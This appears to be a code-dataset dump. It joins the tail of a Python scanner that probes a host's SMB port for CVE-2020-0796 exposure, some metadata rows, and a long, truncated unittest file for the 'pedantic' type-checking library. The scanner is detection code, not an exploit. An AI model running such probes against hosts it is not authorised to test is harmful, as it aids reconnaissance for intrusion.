pkt = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
# Generate a Socket
sock = socket.socket(socket.AF_INET)
sock.settimeout(3)
# Get Hostname
hostname = sys.argv[1]
# Connect to Host
print("Scanning System: {}\r\n".format(hostname))
sock.connect(( hostname, 445 ))
# Send Handshake
sock.send(pkt)
# Receive Handshake
nb, = struct.unpack(">I", sock.recv(4))
res = sock.recv(nb)
# Check if SMB Version 3_11 is used
if not res[68:70] == b"\x11\x03":
print("\tYour System {} doesn't use the latest SMB Version. This is insecure as well but you are not effected by CVE-2020-0796".format(hostname))
sys.exit(1)
# Check if uses Compression
if not res[70:72] == b"\x02\x00":
print("\tYour System {} is not vulnearble to CVE-2020-0796".format(hostname))
sys.exit(1)
print("\tYour System {} is vulnearble to CVE-2020-0796".format(hostname))
sys.exit(1)
| 45.076923
| 761
| 0.593857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,818
| 0.775597
|
369f8e2a1f4297f6ea89787a4d4e52bb3722aa03
| 63,998
|
py
|
Python
|
pedantic/tests/tests_pedantic.py
|
LostInDarkMath/Pedantic-python-decorators
|
32ed54c9593e80f63c0499093cb07847d8a5e1df
|
[
"Apache-2.0"
] | null | null | null |
pedantic/tests/tests_pedantic.py
|
LostInDarkMath/Pedantic-python-decorators
|
32ed54c9593e80f63c0499093cb07847d8a5e1df
|
[
"Apache-2.0"
] | null | null | null |
pedantic/tests/tests_pedantic.py
|
LostInDarkMath/Pedantic-python-decorators
|
32ed54c9593e80f63c0499093cb07847d8a5e1df
|
[
"Apache-2.0"
] | null | null | null |
import os.path
import sys
import types
import typing
import unittest
from datetime import datetime, date
from functools import wraps
from io import BytesIO, StringIO
from typing import List, Tuple, Callable, Any, Optional, Union, Dict, Set, FrozenSet, NewType, TypeVar, Sequence, \
AbstractSet, Iterator, NamedTuple, Collection, Type, Generator, Generic, BinaryIO, TextIO, Iterable, Container, \
NoReturn, ClassVar
from enum import Enum, IntEnum
from pedantic import pedantic_class
from pedantic.exceptions import PedanticTypeCheckException, PedanticException, PedanticCallWithArgsException, \
PedanticTypeVarMismatchException
from pedantic.decorators.fn_deco_pedantic import pedantic
TEST_FILE = 'test.txt'
class Parent:
pass
class Child(Parent):
def method(self, a: int):
pass
class TestDecoratorRequireKwargsAndTypeCheck(unittest.TestCase):
def tearDown(self) -> None:
if os.path.isfile(TEST_FILE):
os.remove(TEST_FILE)
def test_no_kwargs(self):
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
calc(42, 40, 38)
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
calc(42, m=40, i=38)
calc(n=42, m=40, i=38)
def test_nested_type_hints_1(self):
@pedantic
def calc(n: int) -> List[List[float]]:
return [0.0 * n]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_nested_type_hints_1_corrected(self):
@pedantic
def calc(n: int) -> List[List[float]]:
return [[0.0 * n]]
calc(n=42)
def test_nested_type_hints_2(self):
"""Problem here: int != float"""
@pedantic
def calc(n: int) -> List[Tuple[float, str]]:
return [(n, str(n))]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_nested_type_hints_2_corrected(self):
@pedantic
def calc(n: int) -> List[Tuple[int, str]]:
return [(n, str(n))]
@pedantic
def calc_2(n: float) -> List[Tuple[float, str]]:
return [(n, str(n))]
calc(n=42)
calc_2(n=42.0)
def test_nested_type_hints_3(self):
"""Problem here: inner function actually returns Tuple[int, str]"""
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return n * x, str(y)
return f
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)(x=3, y=3.14)
def test_nested_type_hints_3_corrected(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[int, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[int, str]:
return n * x, str(y)
return f
calc(n=42)(x=3, y=3.14)
def test_nested_type_hints_4(self):
"""Problem here: return type is actually float"""
@pedantic
def calc(n: List[List[float]]) -> int:
return n[0][0]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=[[42.0]])
def test_nested_type_hints_corrected(self):
@pedantic
def calc(n: List[List[float]]) -> int:
return int(n[0][0])
calc(n=[[42.0]])
def test_nested_type_hints_5(self):
"""Problem here: Tuple[float, str] != Tuple[float, float]"""
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, float]:
return n * float(x), y
return f
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_nested_type_hints_5_corrected(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, float]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, float]:
return n * float(x), y
return f
calc(n=42)
def test_missing_type_hint_1(self):
"""Problem here: type hint for n missed"""
@pedantic
def calc(n) -> float:
return 42.0 * n
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_missing_type_hint_1_corrected(self):
@pedantic
def calc(n: int) -> float:
return 42.0 * n
calc(n=42)
def test_missing_type_hint_2(self):
"""Problem here: Return type annotation missed"""
@pedantic
def calc(n: int):
return 'Hi' + str(n)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_missing_type_hint_2_corrected(self):
@pedantic
def calc(n: int) -> str:
return 'Hi' + str(n)
calc(n=42)
def test_missing_type_hint_3(self):
"""Problem here: type hint for i missed"""
@pedantic
def calc(n: int, m: int, i) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_missing_type_hint_3_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
calc(n=42, m=40, i=38)
def test_all_ok_2(self):
@pedantic
def calc(n: int, m: int, i: int) -> str:
return str(n + m + i)
calc(n=42, m=40, i=38)
def test_all_ok_3(self):
@pedantic
def calc(n: int, m: int, i: int) -> None:
str(n + m + i)
calc(n=42, m=40, i=38)
def test_all_ok_4(self):
@pedantic
def calc(n: int) -> List[List[int]]:
return [[n]]
calc(n=42)
def test_all_ok_5(self):
@pedantic
def calc(n: int) -> List[Tuple[float, str]]:
return [(float(n), str(n))]
calc(n=42)
def test_all_ok_6(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return n * float(x), str(y)
return f
calc(n=42)(x=72, y=3.14)
def test_all_ok_7(self):
@pedantic
def calc(n: List[List[float]]) -> Any:
return n[0][0]
calc(n=[[42.0]])
def test_all_ok_8(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return n * float(x), str(y)
return f
calc(n=42)(x=3, y=3.14)
def test_wrong_type_hint_1(self):
"""Problem here: str != int"""
@pedantic
def calc(n: int, m: int, i: int) -> str:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_1_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> str:
return str(n + m + i)
calc(n=42, m=40, i=38)
def test_wrong_type_hint_2(self):
"""Problem here: str != int"""
@pedantic
def calc(n: int, m: int, i: str) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_2_corrected(self):
@pedantic
def calc(n: int, m: int, i: str) -> int:
return n + m + int(i)
calc(n=42, m=40, i='38')
def test_wrong_type_hint_3(self):
"""Problem here: None != int"""
@pedantic
def calc(n: int, m: int, i: int) -> None:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> None:
print(n + m + i)
calc(n=42, m=40, i=38)
def test_wrong_type_hint_4(self):
"""Problem here: None != int"""
@pedantic
def calc(n: int, m: int, i: int) -> int:
print(n + m + i)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_4_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
calc(n=42, m=40, i=38)
def test_none_1(self):
"""Problem here: None is not accepted"""
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=None)
def test_none_2(self):
@pedantic
def calc(n: int, m: int, i: Optional[int]) -> int:
return n + m + i if i is not None else n + m
calc(n=42, m=40, i=None)
def test_none_3(self):
@pedantic
def calc(n: int, m: int, i: Union[int, None]) -> int:
return n + m + i if i is not None else n + m
calc(n=42, m=40, i=None)
def test_none_4(self):
"""Problem here: function may return None"""
@pedantic
def calc(n: int, m: int, i: Union[int, None]) -> int:
return n + m + i if i is not None else None
calc(n=42, m=40, i=42)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=None)
def test_none_5(self):
@pedantic
def calc(n: int, m: int, i: Union[int, None]) -> Optional[int]:
return n + m + i if i is not None else None
calc(n=42, m=40, i=None)
def test_inheritance_1(self):
class MyClassA:
pass
class MyClassB(MyClassA):
pass
@pedantic
def calc(a: MyClassA) -> str:
return str(a)
calc(a=MyClassA())
calc(a=MyClassB())
def test_inheritance_2(self):
"""Problem here: A is not a subtype of B"""
class MyClassA:
pass
class MyClassB(MyClassA):
pass
@pedantic
def calc(a: MyClassB) -> str:
return str(a)
calc(a=MyClassB())
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(a=MyClassA())
def test_instance_method_1(self):
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
a.calc(i=42)
def test_instance_method_2(self):
"""Problem here: 'i' has no type annotation"""
class MyClassA:
@pedantic
def calc(self, i) -> str:
return str(i)
a = MyClassA()
with self.assertRaises(expected_exception=PedanticTypeCheckException):
a.calc(i=42)
def test_instance_method_2_corrected(self):
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
a.calc(i=42)
def test_instance_method_int_is_not_float(self):
class MyClassA:
@pedantic
def calc(self, i: float) -> str:
return str(i)
a = MyClassA()
with self.assertRaises(expected_exception=PedanticTypeCheckException):
a.calc(i=42)
def test_instance_method_3_corrected(self):
class MyClassA:
@pedantic
def calc(self, i: float) -> str:
return str(i)
a = MyClassA()
a.calc(i=42.0)
def test_instance_method_no_kwargs(self):
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
a.calc(42)
def test_instance_method_5(self):
"""Problem here: instance methods is not called with kwargs"""
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
a.calc(i=42)
def test_lambda_1(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
return lambda x: str(x * i)
calc(i=42.0)(10.0)
def test_lambda_3(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
def res(x: float) -> str:
return str(x * i)
return res
calc(i=42.0)(10.0)
def test_lambda_int_is_not_float(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
def res(x: int) -> str:
return str(x * i)
return res
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=42.0)(x=10)
def test_lambda_4_almost_corrected(self):
"""Problem here: float != str"""
@pedantic
def calc(i: float) -> Callable[[float], str]:
@pedantic
def res(x: int) -> str:
return str(x * i)
return res
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=42.0)(x=10)
def test_lambda_4_almost_corrected_2(self):
@pedantic
def calc(i: float) -> Callable[[int], str]:
@pedantic
def res(x: int) -> str:
return str(x * i)
return res
calc(i=42.0)(x=10)
def test_lambda_5(self):
"""Problem here: float != int"""
@pedantic
def calc(i: float) -> Callable[[float], str]:
@pedantic
def res(x: float) -> str:
return str(x * i)
return res
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=42.0)(x=10)
def test_lambda_corrected(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
@pedantic
def res(x: float) -> str:
return str(x * i)
return res
calc(i=42.0)(x=10.0)
def test_tuple_without_type_args(self):
@pedantic
def calc(i: Tuple) -> str:
return str(i)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=(42.0, 43, 'hi'))
def test_tuple_without_args_corrected(self):
@pedantic
def calc(i: Tuple[Any, ...]) -> str:
return str(i)
calc(i=(42.0, 43, 'hi'))
def test_callable_without_type_args(self):
@pedantic
def calc(i: Callable) -> str:
return str(i(' you'))
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=lambda x: (42.0, 43, 'hi', x))
def test_callable_without_args_correct_with_lambdas(self):
@pedantic
def calc(i: Callable[[Any], Tuple[Any, ...]]) -> str:
return str(i(x=' you'))
calc(i=lambda x: (42.0, 43, 'hi', x))
def test_callable_without_args_corrected(self):
@pedantic
def calc(i: Callable[[Any], Tuple[Any, ...]]) -> str:
return str(i(x=' you'))
@pedantic
def arg(x: Any) -> Tuple[Any, ...]:
return 42.0, 43, 'hi', x
calc(i=arg)
def test_list_without_args(self):
@pedantic
def calc(i: List) -> Any:
return [i]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=[42.0, 43, 'hi'])
def test_list_without_args_corrected(self):
@pedantic
def calc(i: List[Any]) -> List[List[Any]]:
return [i]
calc(i=[42.0, 43, 'hi'])
def test_ellipsis_in_callable_1(self):
@pedantic
def calc(i: Callable[..., int]) -> int:
return i()
@pedantic
def call() -> int:
return 42
calc(i=call)
def test_ellipsis_in_callable_2(self):
@pedantic
def calc(i: Callable[..., int]) -> int:
return i(x=3.14, y=5)
@pedantic
def call(x: float, y: int) -> int:
return 42
calc(i=call)
def test_ellipsis_in_callable_3(self):
"""Problem here: call to "call" misses one argument"""
@pedantic
def calc(i: Callable[..., int]) -> int:
return i(x=3.14)
@pedantic
def call(x: float, y: int) -> int:
return 42
with self.assertRaises(expected_exception=PedanticException):
calc(i=call)
def test_optional_args_1(self):
@pedantic
def calc(a: int, b: int = 42) -> int:
return a + b
calc(a=2)
def test_optional_args_2(self):
@pedantic
def calc(a: int = 3, b: int = 42, c: float = 5.0) -> float:
return a + b + c
calc()
calc(a=1)
calc(b=1)
calc(c=1.0)
calc(a=1, b=1)
calc(a=1, c=1.0)
calc(b=1, c=1.0)
calc(a=1, b=1, c=1.0)
def test_optional_args_3(self):
"""Problem here: optional argument c: 5 is not a float"""
@pedantic
def calc(a: int = 3, b: int = 42, c: float = 5) -> float:
return a + b + c
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc()
def test_optional_args_3_corrected(self):
@pedantic
def calc(a: int = 3, b: int = 42, c: float = 5.0) -> float:
return a + b + c
calc()
def test_optional_args_4(self):
class MyClass:
@pedantic
def foo(self, a: int, b: Optional[int] = 1) -> int:
return a + b
my_class = MyClass()
my_class.foo(a=10)
def test_optional_args_5(self):
@pedantic
def calc(d: Optional[Dict[int, int]] = None) -> Optional[int]:
if d is None:
return None
return sum(d.keys())
calc(d=None)
calc()
calc(d={42: 3})
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(d={42: 3.14})
def test_optional_args_6(self):
""""Problem here: str != int"""
@pedantic
def calc(d: int = 42) -> int:
return int(d)
calc(d=99999)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(d='999999')
def test_enum_1(self):
"""Problem here: Type hint for 'a' should be MyEnum instead of MyEnum.GAMMA"""
class MyEnum(Enum):
ALPHA = 'startEvent'
BETA = 'task'
GAMMA = 'sequenceFlow'
class MyClass:
@pedantic
def operation(self, a: MyEnum.GAMMA) -> None:
print(a)
m = MyClass()
with self.assertRaises(expected_exception=PedanticTypeCheckException):
m.operation(a=MyEnum.GAMMA)
def test_enum_1_corrected(self):
class MyEnum(Enum):
ALPHA = 'startEvent'
BETA = 'task'
GAMMA = 'sequenceFlow'
@pedantic
def operation(a: MyEnum) -> None:
print(a)
operation(a=MyEnum.GAMMA)
def test_sloppy_types_dict(self):
@pedantic
def operation(d: dict) -> int:
return len(d.keys())
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1: 1, 2: 2})
def test_sloppy_types_dict_almost_corrected_no_type_args(self):
@pedantic
def operation(d: Dict) -> int:
return len(d.keys())
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1: 1, 2: 2})
def test_sloppy_types_dict_corrected(self):
@pedantic
def operation(d: Dict[int, int]) -> int:
return len(d.keys())
operation(d={1: 1, 2: 2})
def test_sloppy_types_list(self):
@pedantic
def operation(d: list) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=[1, 2, 3, 4])
def test_sloppy_types_list_almost_corrected_no_type_args(self):
@pedantic
def operation(d: List) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=[1, 2, 3, 4])
def test_sloppy_types_list_corrected(self):
@pedantic
def operation(d: List[int]) -> int:
return len(d)
operation(d=[1, 2, 3, 4])
def test_sloppy_types_tuple(self):
@pedantic
def operation(d: tuple) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=(1, 2, 3))
def test_sloppy_types_tuple_almost_corrected_no_type_args(self):
@pedantic
def operation(d: Tuple) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=(1, 2, 3))
def test_sloppy_types_tuple_corrected(self):
@pedantic
def operation(d: Tuple[int, int, int]) -> int:
return len(d)
operation(d=(1, 2, 3))
def test_sloppy_types_set(self):
@pedantic
def operation(d: set) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1, 2, 3})
def test_sloppy_types_set_almost_corrected_to_type_args(self):
@pedantic
def operation(d: Set) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1, 2, 3})
def test_sloppy_types_set_corrected(self):
@pedantic
def operation(d: Set[int]) -> int:
return len(d)
operation(d={1, 2, 3})
def test_sloppy_types_frozenset(self):
@pedantic
def operation(d: frozenset) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=frozenset({1, 2, 3}))
def test_sloppy_types_frozenset_almost_corrected_no_type_args(self):
@pedantic
def operation(d: FrozenSet) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=frozenset({1, 2, 3}))
def test_sloppy_types_frozenset_corrected(self):
@pedantic
def operation(d: FrozenSet[int]) -> int:
return len(d)
operation(d=frozenset({1, 2, 3}))
def test_type_list_but_got_tuple(self):
@pedantic
def calc(ls: List[Any]) -> int:
return len(ls)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(ls=(1, 2, 3))
def test_type_list_corrected(self):
@pedantic
def calc(ls: Tuple[Any, ...]) -> int:
return len(ls)
calc(ls=(1, 2, 3))
def test_any(self):
@pedantic
def calc(ls: List[Any]) -> Dict[int, Any]:
return {i: ls[i] for i in range(0, len(ls))}
calc(ls=[1, 2, 3])
calc(ls=[1.11, 2.0, 3.0])
calc(ls=['1', '2', '3'])
calc(ls=[10.5, '2', (3, 4, 5)])
def test_aliases(self):
Vector = List[float]
@pedantic
def scale(scalar: float, vector: Vector) -> Vector:
return [scalar * num for num in vector]
scale(scalar=2.0, vector=[1.0, -4.2, 5.4])
def test_new_type(self):
UserId = NewType('UserId', int)
@pedantic
def get_user_name(user_id: UserId) -> str:
return str(user_id)
some_id = UserId(524313)
get_user_name(user_id=some_id)
# the following would be desirable but impossible to check at runtime:
# with self.assertRaises(expected_exception=AssertionError):
# get_user_name(user_id=-1)
def test_list_of_new_type(self):
UserId = NewType('UserId', int)
@pedantic
def get_user_name(user_ids: List[UserId]) -> str:
return str(user_ids)
get_user_name(user_ids=[UserId(524313), UserId(42)])
with self.assertRaises(expected_exception=PedanticTypeCheckException):
get_user_name(user_ids=[UserId(524313), UserId(42), 430.0])
def test_callable_no_args(self):
@pedantic
def f(g: Callable[[], str]) -> str:
return g()
@pedantic
def greetings() -> str:
return 'hello world'
f(g=greetings)
def test_type_var(self):
T = TypeVar('T')
@pedantic
def first(ls: List[T]) -> T:
return ls[0]
first(ls=[1, 2, 3])
def test_type_var_wrong(self):
T = TypeVar('T')
@pedantic
def first(ls: List[T]) -> T:
return str(ls[0])
with self.assertRaises(expected_exception=PedanticTypeVarMismatchException):
first(ls=[1, 2, 3])
def test_type_var_wrong_sequence(self):
T = TypeVar('T')
@pedantic
def first(ls: Sequence[T]) -> T:
return str(ls[0])
with self.assertRaises(expected_exception=PedanticTypeVarMismatchException):
first(ls=[1, 2, 3])
def test_double_pedantic(self):
@pedantic
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return float(x), str(y)
f(x=5, y=3.14)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
f(x=5.0, y=3.14)
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
f(5, 3.14)
def test_args_kwargs(self):
@pedantic
def some_method(a: int = 0, b: float = 0.0) -> float:
return a * b
@pedantic
def wrapper_method(*args: Union[int, float], **kwargs: Union[int, float]) -> float:
return some_method(*args, **kwargs)
some_method()
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
some_method(3, 3.0)
some_method(a=3, b=3.0)
wrapper_method()
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
wrapper_method(3, 3.0)
wrapper_method(a=3, b=3.0)
def test_args_kwargs_no_type_hint(self):
@pedantic
def method_no_type_hint(*args, **kwargs) -> None:
print(args)
print(kwargs)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
method_no_type_hint(a=3, b=3.0)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
method_no_type_hint()
def test_args_kwargs_wrong_type_hint(self):
"""See: https://www.python.org/dev/peps/pep-0484/#arbitrary-argument-lists-and-default-argument-values"""
@pedantic
def wrapper_method(*args: str, **kwargs: str) -> None:
print(args)
print(kwargs)
wrapper_method()
wrapper_method('hi', 'you', ':)')
wrapper_method(a='hi', b='you', c=':)')
with self.assertRaises(expected_exception=PedanticTypeCheckException):
wrapper_method('hi', 'you', ':)', 7)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
wrapper_method(3, 3.0)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
wrapper_method(a=3, b=3.0)
def test_additional_kwargs(self):
@pedantic
def some_method(a: int, b: float = 0.0, **kwargs: int) -> float:
return sum([a, b])
some_method(a=5)
some_method(a=5, b=0.1)
some_method(a=5, b=0.1, c=4)
some_method(a=5, b=0.1, c=4, d=5, e=6)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
some_method(a=5, b=0.1, c=4, d=5.0, e=6)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
some_method(a=5.0, b=0.1, c=4, d=5, e=6)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
some_method(a=5, b=0, c=4, d=5, e=6)
def test_args_kwargs_different_types(self):
@pedantic
def foo(*args: str, **kwds: int) -> None:
print(args)
print(kwds)
foo('a', 'b', 'c')
foo(x=1, y=2)
foo('', z=0)
def test_pedantic_on_class(self):
with self.assertRaises(expected_exception=PedanticTypeCheckException):
@pedantic
class MyClass:
pass
MyClass()
def test_is_subtype_tuple(self):
with self.assertRaises(expected_exception=PedanticTypeCheckException):
@pedantic
def foo() -> Callable[[Tuple[float, str]], Tuple[int]]:
def bar(a: Tuple[float]) -> Tuple[int]:
return len(a[1]) + int(a[0]),
return bar
foo()
def test_is_subtype_tuple_corrected(self):
@pedantic
def foo() -> Callable[[Tuple[float, str]], Tuple[int]]:
def bar(a: Tuple[float, str]) -> Tuple[int]:
return len(a[1]) + int(a[0]),
return bar
foo()
def test_forward_ref(self):
class Conversation:
pass
@pedantic
def get_conversations() -> List['Conversation']:
return [Conversation(), Conversation()]
get_conversations()
def test_alternative_list_type_hint(self):
@pedantic
def _is_digit_in_int(digit: [int], num: int) -> bool:
num_str = str(num)
for i in num_str:
if int(i) == digit:
return True
return False
with self.assertRaises(expected_exception=PedanticTypeCheckException):
_is_digit_in_int(digit=4, num=42)
def test_callable_with_union_return(self):
class MyClass:
pass
@pedantic
def admin_required(func: Callable[..., Union[str, MyClass]]) -> Callable[..., Union[str, MyClass]]:
@wraps(func)
def decorated_function(*args, **kwargs):
return func(*args, **kwargs)
return decorated_function
@admin_required
@pedantic
def get_server_info() -> str:
return 'info'
get_server_info()
def test_pedantic(self):
@pedantic
def foo(a: int, b: str) -> str:
return 'abc'
self.assertEqual('abc', foo(a=4, b='abc'))
def test_pedantic_always(self):
@pedantic
def foo(a: int, b: str) -> str:
return 'abc'
self.assertEqual('abc', foo(a=4, b='abc'))
def test_pedantic_arguments_fail(self):
@pedantic
def foo(a: int, b: str) -> str:
return 'abc'
with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo(a=4, b=5)
def test_pedantic_return_type_fail(self):
@pedantic
def foo(a: int, b: str) -> str:
return 6
with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo(a=4, b='abc')
def test_return_type_none(self):
@pedantic
def foo() -> None:
return 'a'
with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo()
def test_marco(self):
@pedantic_class
class A:
def __init__(self, val: int) -> None:
self.val = val
def __eq__(self, other: 'A') -> bool: # other: A and all subclasses
return self.val == other.val
@pedantic_class
class B(A):
def __init__(self, val: int) -> None:
super().__init__(val=val)
@pedantic_class
class C(A):
def __init__(self, val: int) -> None:
super().__init__(val=val)
a = A(val=42)
b = B(val=42)
c = C(val=42)
assert a == b # works
assert a == c # works
assert b == c # error
def test_date_datetime(self):
@pedantic
def foo(a: datetime, b: date) -> None:
pass
foo(a=datetime(1995, 2, 5), b=date(1987, 8, 7))
foo(a=datetime(1995, 2, 5), b=datetime(1987, 8, 7))
with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo(a=date(1995, 2, 5), b=date(1987, 8, 7))
def test_any_type(self):
@pedantic
def foo(a: Any) -> None:
pass
foo(a='aa')
def test_callable_exact_arg_count(self):
@pedantic
def foo(a: Callable[[int, str], int]) -> None:
pass
def some_callable(x: int, y: str) -> int:
pass
foo(a=some_callable)
def test_callable_bad_type(self):
@pedantic
def foo(a: Callable[..., int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_callable_too_few_arguments(self):
@pedantic
def foo(a: Callable[[int, str], int]) -> None:
pass
def some_callable(x: int) -> int:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=some_callable)
def test_callable_mandatory_kwonlyargs(self):
@pedantic
def foo(a: Callable[[int, str], int]) -> None:
pass
def some_callable(x: int, y: str, *, z: float, bar: str) -> int:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=some_callable)
def test_callable_class(self):
"""
Test that passing a class as a callable does not count the "self" argument "a"gainst the
ones declared in the Callable specification.
"""
@pedantic
def foo(a: Callable[[int, str], Any]) -> None:
pass
class SomeClass:
def __init__(self, x: int, y: str):
pass
foo(a=SomeClass)
def test_callable_plain(self):
@pedantic
def foo(a: Callable[..., Any]) -> None:
pass
def callback(a):
pass
foo(a=callback)
def test_callable_bound_method(self):
@pedantic
def foo(callback: Callable[[int], Any]) -> None:
pass
foo(callback=Child().method)
def test_callable_defaults(self):
"""
Test that a callable having "too many" arguments don't raise an error if the extra
arguments have default values.
"""
@pedantic
def foo(callback: Callable[[int, str], Any]) -> None:
pass
def some_callable(x: int, y: str, z: float = 1.2) -> int:
pass
foo(callback=some_callable)
def test_callable_builtin(self):
@pedantic
def foo(callback: types.BuiltinFunctionType) -> None:
pass
foo(callback=[].append)
def test_dict_bad_type(self):
@pedantic
def foo(a: Dict[str, int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_dict_bad_key_type(self):
@pedantic
def foo(a: Dict[str, int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={1: 2})
def test_dict_bad_value_type(self):
@pedantic
def foo(a: Dict[str, int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={'x': 'a'})
def test_list_bad_type(self):
@pedantic
def foo(a: List[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_list_bad_element(self):
@pedantic
def foo(a: List[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=[1, 2, 'bb'])
def test_sequence_bad_type(self):
@pedantic
def foo(a: Sequence[int]) -> None:
pass
